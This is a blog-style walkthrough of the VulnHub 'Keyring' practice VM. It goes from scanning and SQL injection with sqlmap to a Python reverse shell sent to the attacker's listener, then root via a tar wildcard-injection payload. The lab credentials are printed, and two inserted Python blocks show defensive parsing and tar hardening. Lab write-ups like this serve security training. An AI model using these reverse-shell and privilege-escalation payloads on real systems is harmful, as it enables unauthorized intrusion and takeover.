Penetration practice vulnhub range Keyring
2022-07-01 17:39:00 【It's safe to go to school on Fubo road】
No.26 Keyring
Target information
Download address:
https://www.vulnhub.com/entry/ia-keyring-101,718/
Range: VulnHub.com
Target name: IA: Keyring (1.0.1)
Difficulty: easy to medium
Release date: 30 July 2021
Goal: 2 flags
Lab environment
Attacker: VMware Kali, 192.168.7.3
Target: VirtualBox Linux, IP address assigned automatically
Information gathering
Host scan
Scan the LAN for the target's IP address
sudo nmap -sP 192.168.7.1/24
The host address found by the scan is 192.168.7.157
Port scan
Scan the target's open service ports
sudo nmap -sC -sV -p- 192.168.7.158 -oN keyring.nmap
Two open ports are found: 22 (SSH) and 80 (HTTP)
Web penetration
Visit port 80
http://192.168.7.158
Open the home page and register an account, then log in with it (do not fill in the username and password on the home page; clicking the Login button directly jumps to the login page, where you enter the account and password to log in).
Login succeeds. On the control.php page there is a hint: HPP, HTTP Parameter Pollution.
HTTP Parameter Pollution (HPP)
Brief introduction:
HTTP Parameter Pollution, abbreviated HPP, refers to the way a web container handles HTTP parameters.
HTTP Parameter Pollution (HPP) is a web attack evasion technique that lets an attacker craft an HTTP request to manipulate or retrieve hidden information. The evasion relies on splitting the attack vector across multiple instances of a parameter with the same name; some environments handle such a request by concatenating the values of all instances of that parameter name.
Example :
The source code of HttpPar.php is as follows:
<?php
// Read the str parameter (from GET, POST or cookie) and echo it to the page unescaped
$str = $_REQUEST['str'];
echo $str;
?>
This code receives the value of the HTTP parameter str and displays it on the page. If we visit http://www.xxx.com/HttpPar.php?str=hello, the result displayed is hello.
In an HTTP request, & joins different parameters, for example str=hello&id=1. But if the parameter is repeated, as in str=hello&str=world&str=xxser, PHP takes only the last value, so the output is xxser. This is HTTP Parameter Pollution.
HPP can be combined with SQL injection and XSS, and is mostly used to bypass a WAF.
Understood simply, the HPP hint means we do not yet know which parameter is involved, so first run a directory scan to look for other hints.
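As an added example (not from the original post or the Keyring source), a small Python parser that applies three common duplicate-name policies to the query string from the HttpPar.php discussion, plus a strict parser that refuses repeated names, which is the check a front end or WAF should apply so that its view of a request cannot differ from the back end's. The "first" and "all" policies are the commonly cited Java Servlet and ASP.NET behaviours; "last" is PHP's.

```python
from urllib.parse import parse_qsl

# Constructed query string from the HttpPar.php discussion: the same name, three times.
POLLUTED_QUERY = "str=hello&str=world&str=xxser"


def parse_with_policy(query: str, policy: str) -> dict:
    """Parse a query string into {name: value} under one duplicate-handling policy.

    "last"  - later occurrence overwrites (PHP $_GET / $_REQUEST)
    "first" - first occurrence wins (Java Servlet getParameter)
    "all"   - values joined with commas (ASP.NET Request.QueryString)
    """
    params = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        if policy == "last":
            params[name] = value
        elif policy == "first":
            params.setdefault(name, value)
        elif policy == "all":
            params[name] = value if name not in params else params[name] + "," + value
        else:
            raise ValueError(f"unknown policy {policy!r}")
    return params


def duplicate_parameters(query: str) -> list:
    """Names that occur more than once: what a strict front end should log or reject."""
    counts = {}
    for name, _ in parse_qsl(query, keep_blank_values=True):
        counts[name] = counts.get(name, 0) + 1
    return sorted(name for name, count in counts.items() if count > 1)


def strict_parse(query: str) -> dict:
    """Hardened variant: refuse any request that repeats a parameter name."""
    dups = duplicate_parameters(query)
    if dups:
        raise ValueError("repeated parameter(s): " + ", ".join(dups))
    return dict(parse_qsl(query, keep_blank_values=True))


def rejects(query: str) -> bool:
    """True if the strict parser refuses the query (used to show the hardened behaviour)."""
    try:
        strict_parse(query)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for policy in ("last", "first", "all"):
        print(policy, "->", parse_with_policy(POLLUTED_QUERY, policy)["str"])
    print("strict parser rejects polluted query:", rejects(POLLUTED_QUERY))
```

The three policies return three different values for the same request, which is exactly the discrepancy that lets a payload split across duplicates slip past a filter that only looks at one of them.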
Directory scan
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.7.158 -x php,html,txt
The scan finds a history.php file; visit it
http://192.168.7.158/history.php
It opens as a blank page; presumably parameters must be added to access it. After logging out, visiting the page again shows a prompt.
The prompt says the user was not found, so log in again and try a user parameter
http://192.168.7.158/history.php?user=user1234
Testing with my registered username shows some content; change it to admin and try
http://192.168.7.158/history.php?user=admin
This gives a link: https://github.com/cyberbot75/keyring
It is the repository holding the website source code. In the control.php file there is a system function that can be used directly; test it
http://192.168.7.158/control.php?cmdcntr=id
SQL injection attack
No success. Reading the source code I didn't find any problems, but looking again at the HPP hint and the user parameter I already have, try SQL injection there.
Query the database names
sqlmap -u http://192.168.7.158/history.php?user=user1234 --cookie='PHPSESSID=0ce7psagp018qtd5gndrsdsl8o' --batch --dbs
Query the table names
sqlmap -u http://192.168.7.158/history.php?user=user1234 --cookie='PHPSESSID=0ce7psagp018qtd5gndrsdsl8o' --batch -D users --tables
Dump the table contents
sqlmap -u http://192.168.7.158/history.php?user=user1234 --cookie='PHPSESSID=0ce7psagp018qtd5gndrsdsl8o' --batch -D users -T details --dump
The dump gives the administrator account admin with password myadmin#p4szw0r4d. Log in to the platform with the admin account; on control.php the cmdcntr parameter now has permission to run commands
http://192.168.7.158/control.php?cmdcntr=id
The command executes successfully, so send a reverse shell back to the Kali attack machine
Kali attacker listens on a port
nc -lvvp 4444
Execute the payload
http://192.168.7.158/control.php?cmdcntr=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.7.3",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
The reverse shell succeeds. Let's look for the flag; first switch to bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
Privilege escalation
cat /etc/passwd
There is a john user here. The earlier SQL injection dump also contained a john user; try whether the password is the same. Switch to john; the password is Sup3r$S3cr3t$PasSW0RD
su john
Sup3r$S3cr3t$PasSW0RD
id
Switched to john successfully. The lxd group here could be used to escalate privileges, but first enter the user's home directory and have a look
cd /home/john
ls -al
user.txt is found
cat user.txt
There is also a compress program; let's see what kind of file it is
file compress
It is a SUID binary. Download it and examine its contents; start an HTTP service on the target
python3 -m http.server
On the Kali attacker, download the compress file and view its contents
wget http://192.168.7.158:8000/compress
strings compress
compress executes the tar program, and tar wildcard injection can be used for privilege escalation.
Payload
echo "/bin/bash" > exp.sh
echo "" > "--checkpoint-action=exec=sh exp.sh"
echo "" > --checkpoint=1
./compress
id
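The compress binary is exploitable because it lets a shell wildcard turn file names into tar options. As an added example (not the Keyring author's or the project's code), a Python hardening of such a wrapper: it flags option-shaped names in the directory, and builds the tar command without a shell, with every file named explicitly after the `--` separator so that a name like `--checkpoint=1` is archived as data rather than parsed as a flag. The sample directory in demo() is constructed inline.

```python
import os
import subprocess
import tempfile


def option_like_names(directory: str) -> list:
    """Entries that a shell wildcard would hand to tar looking like options.

    The check a SUID wrapper (or a file-integrity monitor) should run on a
    directory it is about to archive: any entry starting with '-' is suspicious.
    """
    return sorted(name for name in os.listdir(directory) if name.startswith("-"))


def safe_tar_argv(directory: str, archive: str) -> list:
    """Build a tar argv that names every file explicitly after '--'.

    No shell, no wildcard, and '--' ends option parsing in GNU tar, so an
    entry called '--checkpoint=1' is stored as a file, never read as a flag.
    """
    names = sorted(os.listdir(directory))
    return ["tar", "-C", directory, "-cf", os.path.abspath(archive), "--"] + names


def compress_safely(directory: str, archive: str) -> None:
    """Run tar with an argv list (no shell) so file names cannot become options."""
    subprocess.run(safe_tar_argv(directory, archive), check=True)


def demo() -> dict:
    """Constructed scenario: a writable directory seeded with option-shaped names."""
    workdir = tempfile.mkdtemp()
    for name in ("notes.txt", "--checkpoint=1", "--checkpoint-action=exec=sh exp.sh"):
        with open(os.path.join(workdir, name), "w") as fh:
            fh.write("constructed sample file\n")
    argv = safe_tar_argv(workdir, os.path.join(tempfile.gettempdir(), "keyring-demo.tar"))
    sep = argv.index("--")
    return {
        "flagged": option_like_names(workdir),
        "args_before_separator": argv[:sep],
        "names_after_separator": argv[sep + 1:],
    }


if __name__ == "__main__":
    result = demo()
    print("option-like names:", result["flagged"])
    print("tar options:", result["args_before_separator"])
    print("files after '--':", result["names_after_separator"])
```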
Root privileges obtained successfully; view root.txt
cd /root
ls
cat root.txt
Got root.txt, game over. Friends who enjoy shooting range exercises can search WeChat for the "It's safe to go to school on Fubo road" official account, or scan the QR code below, to get more target articles.